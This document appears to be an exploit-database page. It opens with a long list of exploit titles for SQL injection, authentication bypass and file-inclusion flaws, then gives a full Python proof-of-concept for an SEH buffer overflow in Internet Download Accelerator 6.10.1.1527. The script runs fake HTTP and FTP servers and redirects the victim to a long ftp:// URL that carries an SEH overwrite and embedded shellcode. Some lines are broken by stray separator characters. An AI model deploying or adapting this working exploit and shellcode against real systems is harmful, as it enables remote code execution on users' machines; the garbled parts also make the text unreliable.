
3 new exploits QNAP NAS Devices - Heap Overflow Castle Rock Computing SNMPc 7.0.19 - Community String Stack Based Buffer Overflow Internet Download Accelerator 6.10.1.1527 - FTP Buffer Overflow (SEH) PHPFanBase 2.x - (protection.php) Remote File Inclusion PHPFanBase 2.x - 'protection.php' Remote File Inclusion DigiAffiliate 1.4 - (visu_user.asp id) SQL Injection DigiAffiliate 1.4 - 'id' Parameter SQL Injection ExoPHPDesk 1.2.1 - (faq.php) SQL Injection ExoPHPDesk 1.2.1 - 'faq.php' SQL Injection MiniGal b13 - (image backdoor) Remote Code Execution MiniGal b13 - Remote Code Execution PHP Auto Listings - 'moreinfo.php pg' SQL Injection Pre Simple CMS - SQL Injection (Authentication Bypass) PHP Auto Listings - 'pg' Parameter SQL Injection Pre Simple CMS - Authentication Bypass Harlandscripts drinks - (recid) SQL Injection Harlandscripts drinks - 'recid' Parameter SQL Injection Mole Group Taxi Calc Dist Script - (Authentication Bypass) SQL Injection Mole Group Taxi Calc Dist Script - Authentication Bypass DevelopItEasy Membership System 1.3 - (Authentication Bypass) SQL Injection DevelopItEasy Membership System 1.3 - Authentication Bypass NICE FAQ Script - (Authentication Bypass) SQL Injection NICE FAQ Script - Authentication Bypass SoftComplex PHP Image Gallery 1.0 - (Authentication Bypass) SQL Injection SoftComplex PHP Image Gallery 1.0 - Authentication Bypass DELTAScripts PHP Classifieds 7.5 - (Authentication Bypass) SQL Injection DELTAScripts PHP Links 1.3 - (Authentication Bypass) SQL Injection DELTAScripts PHP Shop 1.0 - (Authentication Bypass) SQL Injection SoftComplex PHP Image Gallery - (ctg) SQL Injection DELTAScripts PHP Classifieds 7.5 - Authentication Bypass DELTAScripts PHP Links 1.3 - Authentication Bypass DELTAScripts PHP Shop 1.0 - Authentication Bypass SoftComplex PHP Image Gallery - 'ctg' Parameter SQL Injection TurnkeyForms Business Survey Pro 1.0 - 'id' SQL Injection Mole Group Pizza - (manufacturers_id) Script SQL Injection TurnkeyForms Business 
Survey Pro 1.0 - 'id' Parameter SQL Injection Mole Group Pizza - 'manufacturers_id' Parameter SQL Injection E-topbiz Online Store 1 - (Authentication Bypass) SQL Injection PHP Auto Listings Script - (Authentication Bypass) SQL Injection Mole Group Rental Script - (Authentication Bypass) SQL Injection MyioSoft Ajax Portal 3.0 - (Authentication Bypass) SQL Injection MyioSoft EasyBookMarker - (Authentication Bypass) SQL Injection MyioSoft EasyCalendar - (Authentication Bypass) SQL Injection E-topbiz Online Store 1 - Authentication Bypass PHP Auto Listings Script - Authentication Bypass Mole Group Rental Script - Authentication Bypass MyioSoft Ajax Portal 3.0 - Authentication Bypass MyioSoft EasyBookMarker 4.0 - Authentication Bypass MyioSoft EasyCalendar - Authentication Bypass E-topbiz Online Store 1 - 'cat_id' SQL Injection E-topbiz Online Store 1 - 'cat_id' Parameter SQL Injection Myiosoft EasyBookMarker 4 - (Parent) SQL Injection Myiosoft EasyBookMarker 4 - 'Parent' Parameter SQL Injection Enthusiast 3.1.4 - (show_joined.php path) Remote File Inclusion V3 Chat Profiles/Dating Script 3.0.2 - (Authentication Bypass) SQL Injection Enthusiast 3.1.4 - 'show_joined.php' Remote File Inclusion V3 Chat Profiles/Dating Script 3.0.2 - Authentication Bypass DigiAffiliate 1.4 - (Authentication Bypass) SQL Injection Mole Group Airline Ticket Script - (Authentication Bypass) SQL Injection DigiAffiliate 1.4 - Authentication Bypass Mole Group Airline Ticket Script - Authentication Bypass ExoPHPDesk 1.2 Final - (Authentication Bypass) SQL Injection ZEEMATRI 3.0 - (bannerclick.php adid) SQL Injection ExoPHPDesk 1.2 Final - Authentication Bypass ZEEMATRI 3.0 - 'adid' Parameter SQL Injection Joomla! Component com_books - (book_id) SQL Injection Joomla! Component com_books - 'book_id' Parameter SQL Injection Joomla! / Mambo Component 'com_catalogproduction' - 'id' SQL Injection Joomla! 
/ Mambo Component com_catalogproduction - 'id' Parameter SQL Injection PozScripts Business Directory Script - 'cid' SQL Injection PozScripts Business Directory Script - 'cid' Parameter SQL Injection Alstrasoft Web Host Directory - (Authentication Bypass) SQL Injection Quick Poll Script - 'code.php id' SQL Injection Alstrasoft Web Host Directory - Authentication Bypass Quick Poll Script - 'id' Parameter SQL Injection Bankoi Webhost Panel 1.20 - (Authentication Bypass) SQL Injection Bankoi Webhost Panel 1.20 - Authentication Bypass Minigal b13 - 'index.php list' Remote File Disclosure yahoo answers - 'id' SQL Injection Minigal b13 - Remote File Disclosure yahoo answers - 'id' Parameter SQL Injection PHPstore Wholesale - 'track.php?id' SQL Injection PHPstore Wholesale - 'id' Parameter SQL Injection E-topbiz ADManager 4 - (group) Blind SQL Injection E-topbiz ADManager 4 - 'group' Parameter Blind SQL Injection PHPfan 3.3.4 - (init.php includepath) Remote File Inclusion Jadu Galaxies - 'categoryId' Blind SQL Injection PHPfan 3.3.4 - 'init.php' Remote File Inclusion Jadu Galaxies - 'categoryId' Parameter Blind SQL Injection MemHT Portal 4.0.1 - (avatar) Remote Code Execution MemHT Portal 4.0.1 - Remote Code Execution MemHT Portal 4.0.1 - (pvtmsg) Delete All Private Messages Exploit MemHT Portal 4.0.1 - Delete All Private Messages Exploit MyioSoft Ajax Portal 3.0 - (page) SQL Injection MyioSoft Ajax Portal 3.0 - 'page' Parameter SQL Injection X10media Mp3 Search Engine < 1.6.2 Admin Access X10media Mp3 Search Engine < 1.6.2 - Admin Access Arab Portal 2.2 - (Authentication Bypass) SQL Injection Arab Portal 2.2 - Authentication Bypass Arab Portal 2.x - (forum.php qc) SQL Injection Arab Portal 2.x - 'forum.php' SQL Injection Arab Portal 2.2 - (mod.php module) Local File Inclusion Arab Portal 2.2 - 'mod.php' Local File Inclusion Collabtive - SQL Injection Collabtive 0.65 - SQL Injection All Enthusiast ReviewPost PHP Pro 2.5 - showproduct.php SQL Injection All Enthusiast 
ReviewPost PHP Pro 2.5 - showcat.php SQL Injection All Enthusiast ReviewPost PHP Pro 2.5 - 'showproduct.php' SQL Injection All Enthusiast ReviewPost PHP Pro 2.5 - 'showcat.php' SQL Injection All Enthusiast PhotoPost PHP Pro 5.0 - adm-photo.php Arbitrary Image Manipulation All Enthusiast PhotoPost PHP Pro 5.0 - 'adm-photo.php' Arbitrary Image Manipulation Collabtive 1.0 - (manageuser.php task Parameter) SQL Injection Collabtive 1.0 - 'manageuser.php' SQL Injection Arab Portal 2.0 - Link.php SQL Injection Arab Portal 2.0 - 'Link.php' SQL Injection Arab Portal System 2.0 - online.php title Parameter Cross-Site Scripting Arab Portal System 2.0 - download.php title Parameter Cross-Site Scripting Arab Portal 2.0 - 'online.php' Cross-Site Scripting Arab Portal 2.0 - 'download.php' Cross-Site Scripting ExoPHPDesk 1.2 - Pipe.php Remote File Inclusion ExoPHPDesk 1.2 - 'Pipe.php' Remote File Inclusion Collabtive 1.1 - (managetimetracker.php id Parameter) SQL Injection Collabtive 1.1 - 'managetimetracker.php' SQL Injection Zeeways Shaadi Clone 2.0 - 'admin/home.php' Authentication Bypass Zeeways Shaadi Clone 2.0 - Authentication Bypass PHPMailer < 5.2.20 / SwiftMailer < 5.4.5-DEV / Zend Framework / zend-mail < 2.4.11 - (AIO) 'PwnScriptum' Remote Code Execution
#!/usr/bin/python
#
# Exploit Title: IDA 6.10.1.1527 FTP SEH Universal exploit.
# Exploit Author: Fady Mohamed Osman (@fady_osman)
# Exploit-db : http://www.exploit-db.com/author/?a=2986
# Youtube : https://www.youtube.com/user/cutehack3r
# Date: Jan 2, 2017
# Vendor Homepage: http://westbyte.com/
# Software Link: http://westbyte.com/index.phtml?page=support&tmp=1&lng=English&product=Internet%20Download%20Accelerator.
# Version: 6.10.1.1527
# Tested on: IDA 6.10.1.1527 Free Version - Windows 7 SP1 - Windows 10.
# --------------
# Internet download accelerator suffers from a BOF when an FTP Download of file with
# long name fails.
# --------------
# To Exploit this issue:
# 1- Run HTTP server that will redirect to the FTP file with long name.
# 2- The ftp server will answer to the commands sent then will open a data connection.
# 3- The script will send an empty file list and close the connection to trigger the BOF condition.
# 5- Happy new year :D.
import SocketServer
import threading
# IP to listen to, needed to construct PASV response so 0.0.0.0 is not gonna work.
# NOTE: the same address is also written literally into the ftp:// URL built in
# HTTPHandler.handle(); the two are not derived from each other, so both must be
# edited together.
ip = "192.168.1.100"
ipParts = ip.split(".")
# FTP PASV reply tuple "(h1,h2,h3,h4,p1,p2)": the four address octets followed by
# the data port as high and low byte.  151*256 + 130 = 38786, which is the port
# the data-connection server is bound to in the __main__ block below.
PasvResp = "("+ ipParts[0]+ "," + ipParts[1]+ "," + ipParts[2] + "," + ipParts[3] + ",151,130)"
# Run Calc.exe
# Byte string the author labels as the calc.exe payload.  It is embedded verbatim
# in the redirect URL by HTTPHandler.handle(), which pads it out to 1056 bytes.
buf=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")
class HTTPHandler(SocketServer.BaseRequestHandler):
    """
    The request handler class for our HTTP server.

    This is just so we don't have to provide a suspicious FTP link with long name.

    Every request, whatever it contains, is answered with an HTTP 302 whose
    Location header is the ftp:// URL assembled in handle().  The request
    bytes are read once and otherwise ignored.
    """

    def handle(self):
        # self.request is the TCP socket connected to the client
        # Read the request only to drain it; its content is never inspected.
        self.data = self.request.recv(1024).strip()
        print "[*] Recieved HTTP Request"
        print "[*] Sending Redirction To FTP"
        # Build the redirect target: an ftp:// URL whose path is the over-long
        # file name described in the header comment.  The host is written
        # literally here and is not taken from the module-level `ip`.
        # `buf` is the module-level payload string; the trailing run of "B"
        # pads it so that buf + padding is exactly 1056 bytes.
        # SEH Offset 336 - 1056 bytes for the payload - 0x10011b53 unzip32.dll ppr 0x0c
        payload = "ftp://192.168.1.100/"+ 'A' * 336 + "\xeb\x06\x90\x90" + "\x53\x1b\x01\x10" + buf + "B" * (1056 - len(buf))
        # Minimal 302 response; the Location header carries the ftp:// URL
        # the client is expected to follow.
        self.request.sendall("HTTP/1.1 302 Found\r\n" +
        "Host: Server\r\nConnection: close\r\nLocation: "+
        payload+
        "\r\nContent-type: text/html; charset=UTF-8\r\n\r\n")
        print "[*] Redirection Sent..."
class FTPHandler(SocketServer.BaseRequestHandler):
    """
    The request handler class for our FTP server.

    Walks the client through a fixed, scripted control-channel exchange
    (USER, PASS, SYST, TYPE, REST, CWD, PASV, LIST).  Whatever the client
    sends for each step is accepted and echoed to stdout, and a canned
    success reply is returned; the PASV step answers with the module-level
    PasvResp tuple so the client opens its data connection to our data port.
    """

    # One entry per expected client command, in the order the client is
    # expected to send them: (label used in the log line, recv() buffer size,
    # canned reply).  A reply of None means "use the computed PASV response".
    _SCRIPT = (
        ("User", 1024, "331 User name okay, need password\r\n"),
        ("PASS", 1024, "230-Password accepted.\r\n230 User logged in.\r\n"),
        ("SYST", 1024, "215 UNIX Type: L8\r\n"),
        ("Type", 1024, "200 Type set to I\r\n"),
        ("Rest", 1024, "200 OK\r\n"),
        ("CWD", 2048, "250 CWD Command successful\r\n"),
        ("PASV", 1024, None),
        ("LIST", 1024, "150 Here comes the directory listing.\r\n226 Directory send ok.\r\n"),
    )

    def handle(self):
        # self.request is the control-channel socket accepted from the client.
        control = self.request
        # Greeting goes out before the client says anything.
        control.sendall("220 Nasty FTP Server Ready\r\n")
        for label, bufsize, reply in self._SCRIPT:
            command = control.recv(bufsize).strip()
            print("[*] Recieved " + label + " Command: " + command)
            if reply is None:
                # PASV needs the address/port tuple built at module level.
                reply = "227 Entering Passive Mode " + PasvResp + "\r\n"
            control.sendall(reply)
class FTPDataHandler(SocketServer.BaseRequestHandler):
|
|
"""
|
|
The request handler class for our FTP Data connection.
|
|
|
|
This will send useless response and close the connection to trigger the error.
|
|
"""
|
|
|
|
def handle(self):
|
|
# self.request is the TCP socket connected to the client
|
|
print "[*] Recieved FTP-Data Request"
|
|
print "[*] Sending Empty List"
|
|
# just send back the same data, but upper-cased
|
|
self.request.sendall("total 0\r\n\r\n")
|
|
self.request.close()
if __name__ == "__main__":
    # All three listeners bind to the module-level `ip`; only the HTTP port
    # is named here, the FTP ports are given inline below.
    HOST, PORT = ip, 8000
    # Let the sockets be rebound straight after a previous run of the script.
    SocketServer.TCPServer.allow_reuse_address = True

    print "[*] Starting the HTTP Server."
    # Create the HTTP server, bound to `ip` (not localhost) on port 8000.
    HTTPServer = SocketServer.TCPServer((HOST, PORT), HTTPHandler)

    # Running the http server (using a thread so we can continue and listen for FTP and FTP-Data).
    # Daemon thread: it is torn down when the main thread returns from raw_input().
    HTTPThread = threading.Thread(target=HTTPServer.serve_forever)
    HTTPThread.daemon = True
    HTTPThread.start()

    print "[*] Starting the FTP Server."
    # Running the FTP server (control channel on port 21).
    FTPServer = SocketServer.TCPServer((HOST, 21), FTPHandler)

    # Running the FTP server thread.
    FTPThread = threading.Thread(target=FTPServer.serve_forever)
    FTPThread.daemon = True
    FTPThread.start()

    print "[*] Opening the data connection."
    # Opening the FTP data connection - DON'T CHANGE THE PORT.
    # 38786 is what the ",151,130" pair in PasvResp encodes (151*256 + 130),
    # so the two must stay in sync.
    # NOTE(review): this binds FTPHandler, not FTPDataHandler; FTPDataHandler
    # is defined above but never referenced in this file — confirm which
    # handler is intended for the data port.
    FTPData = SocketServer.TCPServer((HOST, 38786), FTPHandler)

    # Running the FTP Data connection Thread.
    DataThread = threading.Thread(target=FTPData.serve_forever)
    DataThread.daemon = True
    DataThread.start()

    print "[*] Listening for FTP Data."
    # Making the main thread wait.
    # raw_input() returns on a full line, so Enter (not any key) ends the
    # script; the daemon server threads stop with it.
    print "[*] To exit the script please press any key at any time."
    raw_input()